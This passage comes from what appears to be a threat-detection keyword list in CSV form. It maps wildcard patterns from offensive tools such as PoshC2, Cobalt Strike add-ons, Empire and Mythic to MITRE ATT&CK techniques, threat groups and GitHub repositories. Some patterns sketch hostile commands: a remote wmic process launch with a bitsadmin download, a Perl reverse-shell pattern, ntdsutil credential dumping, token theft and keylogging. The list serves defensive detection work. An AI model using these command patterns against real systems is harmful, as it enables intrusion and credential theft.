- APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","0","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*start wmic /node:@C:\*.txt /user:*/password:* process call create *cmd.exe /c bitsadmin /transfer *.exe *","greyware_tool_keyword","wmic","WMIC suspicious transfer ","T1105 - T1041 - T1048","TA0002 - TA0003 - TA0010","N/A","N/A","Exploitation 
Tools","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*start_mythic_server.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*start_nbnsspoof*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Start-ACLsAnalysis -Domain*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*startanotherimplant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - 
T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Start-CaptureServer.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*startdaisy*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Start-domainACLsAnalysis*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*starting Multi-Layered ACLight scan*","offensive_tool_keyword","ACLight","A tool for advanced discovery of 
Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*-start-keylogger*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"*start-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*start-keystrokes-writefile*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Start-MonitorTCPConnections.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1144","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*start-process ntdsutil.exe *create full**","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - 
T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*StartProcessFake(*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*Start-PSAmsiClient.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Start-PSAmsiServer.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Start-TCPMonitor*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Start-MonitorTCPConnections.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*startupfolderperistence.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*Start-WebServer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*StartWebServiceBeacon*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*static_syscalls_apc_spawn *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*static_syscalls_apc_spawn*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*static_syscalls_dump*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*statistically-likely-usernames*","offensive_tool_keyword","statistically-likely-usernames","This resource contains wordlists for creating statistically likely usernames for use in username-enumeration. simulated password-attacks and other security testing tasks.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/insidetrust/statistically-likely-usernames","1","1","N/A","N/A","7","699","112","2022-08-31T20:27:53Z","2016-02-14T23:24:39Z" +"*StayKit.cna*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.cna*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.exe*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.git*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*STDIN->fdopen($c*r)*$~->fdopen($c*w)*system$_ while<>*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*Steal_Pipe_Token /PipeName*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*steal_token 
*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*steal_token(*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"*steal_token.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*steal_token_access_mask*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*steal-cert.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*StealCookie-28050355-D9DF-4CE7-BFBC-4F7DDE890C2A.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - 
